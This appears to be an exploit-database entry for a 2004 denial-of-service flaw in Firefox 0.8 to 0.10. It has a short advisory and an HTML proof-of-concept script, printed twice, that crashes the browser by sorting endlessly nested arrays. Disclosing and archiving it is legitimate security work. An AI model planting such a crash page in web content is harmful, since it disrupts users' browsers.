Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of Service

Author: Berend-Jan Wever
type: dos
platform: windows
port: 
date_added: 2004-11-25 
date_updated: 2016-12-23 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comfirefox08.exe

source: https://www.securityfocus.com/bid/11752/info

Mozilla Firefox is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

It is not known if other Mozilla products or Gecko-based browsers are affected by this vulnerability.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>